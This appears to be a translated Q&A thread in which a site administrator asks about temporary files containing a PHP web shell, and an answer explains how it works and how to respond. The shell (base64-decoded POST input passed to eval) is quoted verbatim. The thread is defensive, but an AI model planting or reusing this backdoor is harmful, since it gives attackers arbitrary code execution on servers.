Geek Answers Handbook

PHP code contained in phpXXXX.tmp files in temp directory

I noticed that in our temp directory there are several temporary files with names like phpA3F9.tmp

Entering the contents, I find the number followed by some PHP code, the following code appears in several files

9990000 <?php $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>

This seems to be an attack attempt, but I believe that it relies on the ability of an attacker to execute code in the tmp folder.

Can anyone explain what is going on here? What are the risks? How do these files get into the tmp folder? And how to stop them?

I don't know if this is relevant, but we are running PHP 5.5 on IIS

+6
source share
1 answer

Story: your server may already have been compromised.

These are PHP rockets - basically harmless where they are, but if they get to your web root, they will allow an attacker to execute any arbitrary code on your server.

The key parts for understanding the shell are:

 $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;");

It takes any code in general from the $_POST variable, base64_decode it, and then runs it through eval when suppressing any errors.

It is possible that they are downloaded through a form on your website and uploaded to a temporary folder as an intermediate step, hoping that they will go to a web accessible location. Another option is that your server already has a shell or rootkit, and it puts these files in any writable folders that it can find.

So what to do about it? Check server logs - if you see successful script connections that you don’t recognize, you may be compromised. Find any downloadable forms on your site and block them (user authentication is required, etc.), and then if you are sure that you have been compromised, do not worry when trying to clear it. Move the new server, transfer clean code, important files and data to a clean server.

+5
source

More articles:


All Articles